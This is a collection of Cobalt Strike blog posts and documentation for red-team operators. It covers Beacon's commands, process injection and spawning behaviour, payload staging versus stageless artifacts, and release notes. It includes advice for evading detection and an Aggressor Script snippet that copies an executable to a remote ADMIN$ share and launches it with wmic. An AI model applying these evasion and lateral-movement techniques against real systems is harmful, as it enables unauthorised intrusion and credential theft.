The following commands are built into Beacon and exist to configure Beacon or perform house-keeping actions. Some of these commands (e.g., clear, downloads, help, mode, note) do not generate a task for Beacon to execute.

cancel
checkin
clear
downloads
help
jobs
mode dns
mode dns-txt
mode dns6
mode http
note
powershell-import
sleep
socks stop
spawnto

Post-Exploitation Jobs (Process Execution + Remote Process Injection)

Many Beacon post-exploitation features spawn a process and inject a capability into that process. Beacon does this for a number of reasons: (i) this protects the agent if the capability crashes, (ii) this scheme makes it seamless for an x86 Beacon to launch x64 post-exploitation tasks. The following commands run as post-exploitation jobs:

browserpivot
bypassuac
covertvpn
dcsync
desktop
elevate
execute-assembly
hashdump
keylogger
logonpasswords
mimikatz
net
portscan
powerpick
psinject
pth
runasadmin
screenshot
shspawn
spawn
ssh
ssh-key
wdigest

OPSEC Advice: Use the spawnto command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe (you probably don’t want that). The ppid command will change the parent process these jobs are run under as well.

Process Execution

These commands spawn a new process:

execute
runas
runu

OPSEC Advice: The ppid command will change the parent process of commands run by execute. The ppid command does not affect runas or spawnu.

Process Execution: Cmd.exe

The shell command depends on cmd.exe.

The pth and getsystem commands get honorable mention here. These commands rely on cmd.exe to pass a token to Beacon via a named pipe. The command pattern to pass this token is an indicator some host-based security products look for.

OPSEC Advice: the shell command uses the COMSPEC environment variable to find the preferred command-line interpreter on Windows. Use Aggressor Script’s &bsetenv function to point COMSPEC to a different cmd.exe location, if needed. Use the ppid command to change the parent process the command-line interpreter is run under. To pth without cmd.exe, execute the pth steps by hand. Don’t use getsystem. There are other ways to acquire a SYSTEM token.

Process Execution: PowerShell.exe

The following commands launch powershell.exe to perform some task on your behalf.

elevate uac-token-duplication
powershell
spawnas
spawnu
winrm
wmi

OPSEC Advice: Use the ppid command to change the parent process powershell.exe is run under. Be aware, there are alternatives to each of these commands that do not use powershell.exe:

  • The uac-token-duplication privilege escalation exploit has runasadmin. This command runs a command of your choosing with the same UAC bypass.
  • spawnu has runu which runs an arbitrary command under another process.
  • spawnas has runas which runs an arbitrary command as another user.
  • powershell has powerpick, this command runs powershell scripts without powershell.exe.
  • It’s also possible to laterally spread without the winrm and wmi commands.

Remote Process Injection

The post-exploitation job commands (previously mentioned) rely on process injection too. The other commands that inject into a remote process are:

dllinject
dllload
inject
shinject

Service Creation

The following internal Beacon commands create a service (either on the current host or a remote target) to run a command. These commands use Win32 APIs to create and manipulate services.

getsystem
psexec
psexec_psh

Why is rundll32.exe connecting to the internet?

Previously, I wrote a blog post to answer the question: why is notepad.exe connecting to the internet? This post was written in response to a generation of defenders zeroing in on the notepad.exe malware epidemic that was plaguing them. Many offensive actions require spawning a new process to inject something into. In the Metasploit Framework (and ancient versions of Cobalt Strike), notepad.exe was the default process to spawn for these actions.

Today, rundll32.exe is the process Cobalt Strike will spawn when it needs a one-off process to inject something into. I’ve had many people write and ask: “Raphael, why rundll32.exe?” Others ask, “how do I switch from rundll32.exe to something else?” This blog post aims to answer these questions.

User-driven Attacks

Several of Cobalt Strike’s user-driven attacks automatically migrate the payload stager to a new process and then run it. I do this for two reasons:

First, the user-driven attack might land code execution in an x64 process. We can’t run an x86 payload in an x64 process. The solution here is to migrate. Cobalt Strike’s Java Applet attacks and the Microsoft Office macro attacks both migrate to rundll32.exe (by default).

Cobalt Strike’s user-driven attacks migrate for another good reason. What happens if the user closes the application we used to get code execution? If our payload ran within that application, our access would go away with it. If our payload lives elsewhere, our access is safe. This is another reason Cobalt Strike’s attacks migrate.

So, why rundll32.exe? Why not something else? Honestly, it doesn’t matter what I pick. Anything I pick is now the default. Because people rarely change defaults, it will show up enough that someone will notice. The right thing here, for all parties, is to know how to change the defaults. Fortunately, this isn’t too hard to do.

Cobalt Strike does not provide a way to override the default macro attack. Fortunately, its choice of rundll32.exe is a string inside of the macro that you can edit. If this choice does not work for you, change this to another process. Many times, I have edited Cobalt Strike’s VBA macro to spawn Internet Explorer and inject my stager into it. I found this was necessary for security postures that restricted which applications could make outbound connections.

The Java Applet is also easy to fix. If you’re using the Java Signed Applet attack with Cobalt Strike, chances are you’re familiar with the Applet Kit. This is the source code to Cobalt Strike’s Java Applet attack and the scripts necessary to build it. You’ve probably downloaded this kit to sign Cobalt Strike’s Applet with your code signing certificate. If you want the Java Applet to migrate elsewhere, edit src/injector.c, change rundll32.exe to something else, and rebuild the Applet Kit. This will require that you have the mingw-w64 package installed.

Executable and DLL Artifacts

Cobalt Strike’s options to export an x64 DLL to deliver an x86 Beacon also migrate to rundll32.exe. I do this for good reason. I can’t host the x86 Beacon inside of an x64 process! Again, the answer here is to migrate and I migrate to a default: rundll32.exe.

Cobalt Strike also generates executables that respond to commands from the Windows Service Control Manager. Cobalt Strike uses these executables with its psexec command and it lets you export them as well. These service executables automatically migrate your payload or stager. Why? I do this to make the service easier to cleanup. In the case of psexec, I can’t get rid of the executable until it stops running. If the service executable didn’t migrate, Cobalt Strike’s psexec command would have to wait until your session stopped to clean up the executable it put on target. That’s no good! This is why the service executables migrate.

Fortunately, changing the rundll32.exe indicator is pretty easy to do as well. Cobalt Strike allows users to change it process to generate executables and DLLs. This is possible through the Artifact Kit. The Artifact Kit is source code to Cobalt Strike’s executable/DLL templates and it’s a script to override Cobalt Strike’s internal process to patch shellcode into these templates.

If you edit src-common/patch.c, you can change the migrate process from rundll32.exe to something else. Rebuild the artifact kit, load its script into your Cobalt Strike client, and from that point on—you’re free of rundll32.exe in your service executable and x64 DLL artifacts.

Spawning Sessions

rundll32.exe rears its ugly head in other places too. A favorite workflow in Cobalt Strike is the ability to right-click a session, select Spawn, and send a session to another listener. This command spawns a process and injects a payload stager for the chosen listener into it. I spawn a process because stagers do crash from time to time. Injecting the stager into another process protects your access from that crash.

When Beacon spawns an executable for session passing, which one does it spawn? Why our friend, rundll32.exe. Of course!

You may ask, how do I change this? There are a few answers to this question. The first answer is to reconsider your use of the spawn command. The spawn command creates a child process off of your Beacon process. This child process makes outbound network connections. If a hunt team is watching process creates and network connections, your access will stand out like a sore thumb. I recommend using the inject command to pass sessions instead.

That aside, let’s say you want to continue to use the spawn command. Your choice! Here’s how to move away from rundll32.exe: First, you may change which command Beacon spawns with the built-in spawnto command. This command will change the spawn process for that Beacon instance to something else.

You may also change the default for all of your Beacon sessions with a Malleable C2 profile. Malleable C2 is Cobalt Strike’s technology to allow you to change indicators and behaviors in the Beacon payload. It’s quite handy if you want to make Beacon look like other malware or blend-in to look like something totally innocuous. Malleable C2 has an option, spawnto, that changes this default to something else.

Post Exploitation Jobs

Let’s cover the last place rundll32.exe likes to show itself, post-exploitation jobs. Beacon is a very small payload. It’s single threaded. It’s designed to do a few very simple things. It calls home, it executes a few base things, and it monitors jobs.

Post-exploitation features such as hashdump, mimikatz, screenshots, keystroke loggers, and others run as jobs. In Beacon parlance, a job is a post-exploitation task that lives in another process. This design serves a few purposes. First, it makes it possible for you to inject a capability (e.g., the screenshot tool) into a process of your choosing. This allows you to get results from the right place without migrating your access. That’s nice! Second, some post-exploitation tasks absolutely must run from a process that matches the operating system’s architecture. This scheme allows an x86 Beacon to seamlessly run x64 post-exploitation jobs without any bother to the operator. Things just work! Third, this scheme protects your access. If, for some reason (heaven forbid!) a post-exploitation task were to crash, this scheme isolates your access from that failure.

Anyways, you have the option to inject some jobs into a process of your choosing. Others jobs just kick off a process, inject the capability, let it run, get results, and tear the process down. These jobs that kick off a process happen to spawn, our old friend, rundll32.exe.

You may ask, how do I change this? Fortunately, there’s not a lot of new advice to offer here. Post-exploitation jobs use the same spawnto process that the spawn command uses. If you edit your Malleable C2 profile to ask that Beacon spawn another placeholder, your post-exploitation jobs will use this placeholder as well.

There is one caveat here. The spawnto command only affects which x86 process the x86 Beacon kicks off. If x86 Beacon has to kick off an x64 process, it doesn’t change this. I do not have a means to change the x64 spawnto process, yet. I’ll take care of this.

And, for the sake of completeness: the spawnto command does not affect which x86 process the x64 Beacon kicks off, when it needs to run an x86 job. If x64 Beacon has to kick off an x86 process, it will use rundll32.exe. I do not have a means to change this yet either. Again, this is one of those todo items.

Update 13 December 2016: Cobalt Strike 3.6 allows you to set the x86 and x64 spawnto value via the spawnto command and Malleable C2.

You’re now empowered!

This post was a lovely stroll through the migrate and spawning behavior of Cobalt Strike 3.0 and later. There are three take-aways for this post:

1. Cobalt Strike migrates stagers and tasks to other processes. It does this a lot. Usually for good reasons!

2. The default process Cobalt Strike migrates to is rundll32.exe.

3. You have the power to change this behavior in most cases.

Talk to your children about Payload Staging

Time to time, I find myself in an email exchange about payload security and payload staging. The payload security discussion revolves around Beacon’s security features. Once it is running on target, Beacon takes steps to authenticate its controller and establish a session-specific key to decrypt tasks and encrypt output. I discuss these security features at the end of the Infrastructure lecture in Advanced Threat Tactics. Questions on this topic are usually easy to field.

Payload Staging is a different animal though. Payload Stagers are tiny programs that connect to a controller, download a payload, and run it. Payload Staging is helpful to pair large payloads (e.g., Beacon, Meterpreter, etc.) with attacks that have size constraints. The payload stagers in Cobalt Strike do not authenticate the controller or verify the payload they download. Questions on this topic usually spawn discussion.

In this post, I’ll explain why Cobalt Strike’s stagers are the way they are. I’ll also discuss ways you can adapt your use of Cobalt Strike to limit payload staging over a hostile network.

The Threat Model

People who ask questions about staging and payload security have a threat model in mind. They assume that there is an actor present in the communication path between their targets and their Cobalt Strike controller. They also assume that this actor has the ability to observe and manipulate data that traverses this communication path.

This is a fair assumption. A traceroute between a target system and an externally hosted Cobalt Strike team server will yield many systems that you and your customer do not control.

A malicious actor, present in your payload communication path, could man-in-the-middle the staging process and deliver their payload stage to your target. This would give the malicious actor access to your target. That’s no good!

A payload stager could mitigate this problem in one of two ways. The stager could authenticate the server that hosts the stage. Or, the stager might take steps to verify that the stage it receives is the one you intended to send.

Simple enough. Why don’t Cobalt Strike’s stagers authenticate their controllers or verify the payload stage after staging completes? Let’s discuss that.

Size Matters

My first excuse to deflect this discussion is size. The larger a payload stager becomes, the fewer attacks you can use it with. This limits our ability to stick security features into a payload stager.

The above statement is true, but the excuse is somewhat thin with my product. Why? Cobalt Strike isn’t an exploit development framework. Cobalt Strike does have size constrained attack vectors, but the size constraints I deal with are nothing like what you’d see in an unforgiving memory corruption exploit.

Ok, if that’s all true, then why does Cobalt Strike use small stagers with no security features? Cobalt Strike uses these stagers to stay compatible with the Metasploit Framework. Remember, until 3.0, Cobalt Strike was a collection of features built on top of the Metasploit Framework. The easiest way to make Beacon work with the Metasploit Framework’s exploits and modules was to stay compatible with the Metasploit Framework’s staging process.

Even with Cobalt Strike as a separate platform, this compatibility with the Metasploit Framework has its benefits. For example, it’s quite easy to use a Metasploit Framework exploit to deliver a Cobalt Strike Beacon payload. Just set PAYLOAD to a Meterpreter payload that uses the same stager, point LHOST/LPORT at Cobalt Strike, and fire away!

The Chicken and the Egg

You may not buy the size excuse, that’s fine. Earlier, I mentioned that the purpose of payload staging is to pair a large payload with a size-constrained attack. Let’s assume that we have a stager with amazing security features. Let’s also assume that this attack is a file that the target downloads from your controller.

To reach your target, the attack with your secure stager must travel over a potentially hostile network. If we apply the same threat model to the attack delivery process, we find ourselves in a hopeless position. The attacker might choose to replace our secure stager in the attack with another stager that acts according to their wishes. We lose anyways.

This is the chicken and the egg problem. If we can’t securely deliver the stager that securely downloads our payload, then how can we trust the stager?

Sometimes there’s a Chicken. Let’s protect the Egg.

If you’ve read this far, you might feel the discussion is getting a little academic. Sure, if an attacker is at the vantage point where they can manipulate the stager, then all bets are off. There are situations where the “chicken and the egg” assumptions don’t apply.

Many of my customers work assume breach engagements. These engagements focus on the target’s detection and response capability, not their patch management or phishing awareness. In an assume breach engagement, the red team is often given a foothold to work from. It’s quite feasible to deliver an attack package over a channel that bypasses our hostile network described above.

If the red team’s foothold was setup in a secure way AND the red team’s payload is up to the task, then we can assume the red team has a safe channel to work with. In this case, the chicken and the egg problem doesn’t apply. The open question is, if these assumptions are in play, what are the best ways to operate with less staging risk? Let’s dig into that.

HOWTO: Reduce Network Staging in Your Operations

Last week, I wrote a blog post about stageless payloads and discussed why you might find this feature valuable. I mentioned that stageless payloads are attractive when the risks of payload staging are not acceptable to your organization. Here’s why: A stageless payload artifact contains Cobalt Strike’s Beacon payload and its configuration in one file. Stageless payloads don’t use stagers. If you can securely deliver and run a stageless payload artifact on your target, you benefit from Beacon’s security features right away.

Access

In assume breach engagements, use a stageless payload artifact to seed your foothold. Attacks -> Packages -> Windows EXE (S) exports a stageless payload artifact. Cobalt Strike has several stageless payload artifact options. You can export Beacon as an executable, a DLL, a service executable, a PowerShell script, or shellcode. One of these options is bound to work for your target. Once a stageless Beacon is on target, you have a (presumably) secure channel to work with.

Staging isn’t just initial access though. Staging is a very convenient tactic and it’s present in many post-exploitation workflows. Multiple toolsets use staging in their session passing, privilege escalation, and lateral movement workflows. With some adjustments, it’s possible to perform these actions without staging a payload over a hostile network.

Session Passing

Let’s start with session passing. This tactic is a way to use an active payload to spawn another payload. Beacon’s spawn and inject commands are designed to pass sessions via stagers. It’s possible to pass sessions in Cobalt Strike without staging. Go to Attacks -> Packages -> Windows EXE (S) and export a raw stageless payload artifact. This file is essentially a large-blob of shellcode that contains the Beacon payload. Use the shinject command in Beacon to inject this shellcode into a process and run it. You can export and use shinject with the x86 and x64 raw stageless payload output.

Privilege Escalation

What about privilege escalation? Beacon’s elevate, spawnas, and bypassuac commands target a listener. These commands do not have alternatives to work with a stageless payload artifact. How do we avoid the risks of staging an elevated payload over a hostile network? Create a listener for Cobalt Strike’s SMB Beacon payload. For actions on the local target, this payload will use a stager that sets up a listening socket bound to localhost. The Beacon, running on the target, will then connect to that stager’s listening socket, send the payload stage, and the stager will clean itself up and run the stage. The stager and the stage communicate through Beacon’s existing communication channel. If you’re worried about the risks of staging an elevated payload over a hostile network, this is one way to work. Bonus: the SMB Beacon is the preferred payload to use with Beacon’s privilege escalation features anyways.

Be aware, there is a potential race if an adversary is co-habitating with you. An adversary, on the same system, might connect to the stager socket first and elevate their payload instead of yours. This isn’t part of the original threat model that provoked this discussion. 🙂

What about privilege escalation based on misconfigurations? For example, you might find that you have an opportunity to elevate via a service with weak permissions. One way to take advantage of this is to drop a service executable to disk, reconfigure the service, and start it with your executable. How do you avoid staging in this case? Use a stageless windows service exe artifact.

Lateral Movement

How about lateral movement? You have options here too. Cobalt Strike’s psexec, psexec_psh, winrm, and wmi commands each depend on payload stagers. That said, you do not have to use this built-in automation for lateral movement. I do most of my lateral movement by exporting a stageless payload artifact, dropping it to an intermediate session, and using built-in Windows capability to copy the artifact to my target and run it. This plays very well with Cobalt Strike’s ability to steal tokens and create tokens from various types of credential material.

What are options to run a payload on a remote system? Look at PowerShell’s Invoke-Command, wmic, sc, schtasks, and at. There’s more, but this is a good starter set of options. I wrote a blog post with various lateral movement recipes a few years ago. The material is still relevant. If you use stageless payload artifacts for lateral movement, you can avoid staging a payload over a hostile network.

Update 8 December 2016

Cobalt Strike 3.5.1 added a host_stage option to Malleable C2. Set this option to false and Cobalt Strike will not host a public HTTP/HTTPS/DNS stage. This option will also remove HTTP/HTTPS/DNS stagers from Cobalt Strike’s workflows.

The Talk

Some of you will read this post and scratch your head. “What is Raphael talking about? I stage payloads all day long, and I like it”. The point of this post is twofold.

First, I hope to get you thinking about your tools, how they work, and the potential risk associated with that. This will allow you to evaluate the risk and make the best decision for your situation. You may decide that the one-off risks of payload staging are worth the benefits. That’s fine.

You may decide otherwise though. This gets to the second point. I have customers who care a great deal about this particular risk. They adjust their operations to work without it. This post is my opportunity to disseminate best practices for future and existing customers with this particular need. If this is you, I hope you found this post useful.

Epilogue: What about TLS Certificate Pinning?

This section doesn’t fit into the narrative of this post, but I field questions on this too:

Earlier, I mentioned that one way to add protection to the staging process is to authenticate the staging server. Last year, the Metasploit Framework gained an optional HTTPS stager that does this. This stager ships with the expected hash of the staging server’s SSL certificate. When the stager connects to the staging server, it checks the server’s SSL cert hash against the value it expects. If they don’t match, it doesn’t download and act on the payload. If they do, it assumes things are good. Pretty neat, right? Ignoring the chicken and the egg problem, this is a way to solve this problem for one protocol.

Occasionally, I get asked, “Raphael, why don’t you add this to Cobalt Strike?” While I think this technique is interesting, I don’t feel this is the right approach for Cobalt Strike. Here’s why:

This technique applies to only one protocol: HTTPS. The HTTPS Beacon isn’t as heavily used as other Beacon options. The HTTPS Beacon’s default self-signed certificate is likely to stick out like a sore thumb. It’s possible to bring a valid certificate into Cobalt Strike, but this is a barrier to fully benefiting from the HTTPS Beacon payload. My customers tend to rely on the HTTP Beacon much more. Thanks to Malleable C2 it’s easy to disguise your Cobalt Strike HTTP traffic to look like something innocuous. The HTTP Beacon isn’t “less secure” than the HTTPS Beacon either. After staging, Beacon’s payload security features are in effect, no matter which data transport you use. If I were to tackle the problem of secure staging, I’d rather focus on an implementation that is transport agnostic.

This verification technique relies on an API specific to WinHTTP. Windows has two APIs for easily making HTTP requests: WinHTTP and WinINet. The Beacon payload and its stagers use WinINet for communication. This is the preferred option for desktop applications. The Metasploit Framework offers the WinHTTP stager (with the verification option) and WinINet stagers with no verification built-in. The Metasploit Framework offers both options because there are certain types of proxy servers that the WinHTTP APIs don’t do well with. Consult The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers for more on this. I don’t believe the benefits of this choose-the-right-stager-API approach outweigh the complexity it would add to Cobalt Strike. Again, this is an opinion specific to my product and user community.

What is a stageless payload artifact?

I’ve had a few questions about Cobalt Strike’s stageless payloads and how these compare to other payload varieties. In this blog post, I’ll explain stageless payloads and why you might prefer stageless payload artifacts in different situations.

What is payload staging?

A stageless payload artifact is an artifact [think executable, DLL, etc.] that runs a payload without staging. To understand stageless payloads, it helps to understand payload staging first.

Many of Cobalt Strike’s attacks and workflows deliver a payload as multiple stages. The first stage is called a stager. The stager is a very tiny program, often written in hand-optimized assembly, that: connects to Cobalt Strike, downloads the Beacon payload (also called the stage), and executes it.

The payload staging process exists for a reason. Staging makes it possible to deliver Beacon [or another payload] in an attack or artifact that has a size constraint. For example, several of Beacon’s lateral movement commands run a PowerShell one-liner to kick off the payload you specify. This PowerShell one-liner is limited to the maximum length of a Windows command + arguments. I can’t stuff a ~200KB payload stage into this space. A payload stager that is a few hundred bytes works just fine though.

What is a stageless payload artifact?

A stageless payload artifact is an artifact that contains the payload stage and its configuration in a self-contained package. Cobalt Strike has had the option to export stageless Beacon artifacts since its March 2014 release. I used to call these “staged” artifacts, but I adopted Metasploit’s nomenclature when the framework gained this capability. Stageless Beacon artifacts include: an executable, a service executable, DLLs, PowerShell, and a blob of shellcode that initializes and runs the Beacon payload.

Why would I use stageless payload artifacts?

Stageless payloads are beneficial in many circumstances. Stageless payloads are a way to work without the staging process. Payload staging is a fragile process and some defenses mitigate it. Stageless payloads allow you to benefit from Beacon’s security features, right away. Beacon authenticates its team server and encrypts communication to and from the team server. Beacon can do this because it does not have the same size constraints a stager has. Cobalt Strike’s stagers do not have any security features. If an attacker can intercept and manipulate the staging process, they can replace your stage with theirs. This is a concern in some situations.

What’s inside of a stageless payload artifact?

Cobalt Strike’s stageless payload executables and DLLs are not much different from its stager-delivering counterparts. Cobalt Strike’s Artifact Kit builds artifacts for stageless payloads and payload stagers from the same source code. The difference is the executables and DLL templates for stageless payloads have more space to hold the entire Beacon payload.

The common denominator for Cobalt Strike’s stageless payload artifacts is the raw output. Think of this as a big blob of shellcode that contains and runs Beacon. When you export a stageless payload artifact, Cobalt Strike patches this big blob of shellcode into the desired artifact template (PowerShell, executable, DLL, etc.).

What’s inside of the raw stageless payload artifact?

The raw stageless artifact is a self-bootstrapping Reflective DLL. A Reflective DLL is a Windows DLL compiled with a Reflective Loader function. The Reflective Loader function is like LoadLibrary, except it can load a DLL that resides somewhere in memory. Stephen Fewer developed the Reflective DLL loader that Cobalt Strike and other toolsets use.

Cobalt Strike’s Beacon is compiled as a Reflective DLL. This allows various payload stagers and the stageless artifacts to inject Beacon into memory.

Now, let’s discuss the self-bootstrapping part. If you’re with me so far, you understand that a Reflective DLL is a DLL with this loader function built into it. This does not make the Reflective DLL self-bootstrapping.

The way the Reflective DLL becomes self-bootstrapping is to overwrite the beginning of the DLL with a valid program that does the following things:

(1) Resolve the memory address where the (currently running) bootstrap program/Reflective DLL resides

(2) Call the Reflective Loader with (1) as an argument. The Reflective Loader lives at a predictable offset from (1). When you see “Offset is: 4432” in the Cobalt Strike console, that’s Cobalt Strike resolving the offset to the Reflective Loader within a DLL.

(3) After the Reflective Loader initializes a DLL, it calls the DLL’s DllMain function. This is when control is passed to Beacon.

In summary, the raw output of Cobalt Strike’s stageless payload is a Reflective DLL with a valid program patched in over the PE header. The patched in program performs steps (1), (2), and (3). This valid program is what makes the Reflective DLL blob self-bootstrapping.  This self-bootstrapping blob is a stageless Cobalt Strike payload.

Cobalt Strike 3.2 – The Inevitable x64 Beacon

Cobalt Strike 3.2, the third release in the 3.x series, is now available. The 3.2 release focuses on fixes and improvements across the Cobalt Strike product.

x64 Beacon

Cobalt Strike’s x86 Beacon plays pretty well in an x64 world. You can inject the keystroke logger and screenshot tools into 64-bit processes. If you run mimikatz or hashdump, Beacon uses the right build of these tools for the system you’re on. Cobalt Strike’s user-driven attacks even do the right thing when they land code execution in an x64 application.

That said, an x86-only payload is a burden. It limits which processes you can inject into. This can hurt your ability to hide. Cobalt Strike 3.2 resolves this with the introduction of the x64 Beacon.

111539_Beacon172.16.14.1293064

From an operator perspective, not much is different. Cobalt Strike listeners prepare x86 and x64 Beacon stages. Beacon’s inject command has an architecture parameter now. The commands and workflows between the x86 and x64 Beacon are the same.

Target Acquisition via Groups

One of my go-to methods to discover hosts is to query the Domain Computers and Domain Controllers groups in a domain. These groups contain the computer accounts for systems joined to a domain. I usually use nslookup to map these names back to IP addresses.

Cobalt Strike 3.2 introduces automation for this process. The net computers command queries the above groups, resolves the names to IP addresses (where it can), and presents this information to you. Cobalt Strike also populates the targets data model with this target information.

034305_Beacon10.10.10.189188

Time to Reset

Jason stands up a Cobalt Strike team server. He configures a listener, sets up an attack package, and clones a website. Jason’s teammate, Jennifer, uses this team server to send a test phishing email to make sure it all works OK. Jason and Jennifer do not want this test to show up in Cobalt Strike’s reports. What do they do?

Jason and Jennifer tear down their team server, delete the data folder, start the team server, reconfigure everything, and hope they do it right. True story.

Cobalt Strike 3.2 adds Reporting -> Reset Data. This option allows you to reset Cobalt Strike’s data model without restarting the team server. This feature doesn’t touch your listeners or hosted sites. It does allow you to stand up a ready-to-go attack, test it, and then reset Cobalt Strike’s data model for reporting purposes.

Check out the release notes to see a full list of what’s new in Cobalt Strike 3.2. Licensed users may use the update program to get the latest. A 21-day Cobalt Strike trial is also available.

Cobalt Strike 3.1 – Scripting Beacons

Cobalt Strike 3.1 is now available. This release adds a lot of polish to the 3.x codebase and addresses several items from user feedback.

Aggressor Script

Aggressor Script is the scripting engine in Cobalt Strike 3.0 and later. It allows you to extend the Cobalt Strike client with new features and automate your engagements with scripts that respond to events.

Scripting was a big focus in the Cobalt Strike 3.1 development cycle. You now have functions that map to most of Beacon’s commands. Scripts can also define new Beacon commands with the alias keyword too.

alias wmi-alt {
local('$mydata $myexe');

# check if our listener exists
if (listener_info($3) is $null) {
berror("Listener $3 does not exist");
return;
}

# generate our executable artifact
$mydata = artifact($3, "exe", true);

# generate a random executable name
$myexe  = int(rand() * 10000) . ".exe";

# state what we're doing.
btask($1, "Tasked Beacon to jump to $2 (" . listener_describe($3, $2) . ") via WMI");

# upload our executable to the target
bupload_raw($1, "\\\\ $+ $2 $+ \\ADMIN$\\ $+ $myexe", $mydata);

# use wmic to run myexe on the target
bshell($1, "wmic /node: $+ $2 process call create \"c:\\windows\\ $+ $myexe $+ \"");

# complete staging process (for bind_pipe listeners)
bstage($1, $2, $3);
}

This release also introduces the agscript command in Cobalt Strike’s Linux package. This command runs a headless Cobalt Strike client designed to host your scripts.

While I can’t say the scripting work is complete yet (it’s not); this release is a major step forward for Aggressor Script. You can learn more about Aggressor Script by reading its documentation.

DcSync

In August 2015, mimikatz introduced a dcsync command, authored by Benjamin Delpy and Vincent LE TOUX. This command uses Windows features for domain replication to pull the password hash for the user you specify. DcSync requires a trust relationship with the DC (e.g., a domain admin token). Think of this as a nice safe way to extract a krbtgt hash.

Cobalt Strike 3.1 integrates a mimikatz build with the dcsync functionality. Beacon also gained a dcsync command that populates the credential model with the recovered hash.

Data Munging

Cobalt Strike 3.1 introduces the ability to import hosts and services from an NMap XML file. Cobalt Strike 3.1 also gives you the ability to export credentials in a PWDump file.

Check out the release notes to see a full list of what’s new in Cobalt Strike 3.1. Licensed users may use the update program to get the latest. A 21-day Cobalt Strike trial is also available.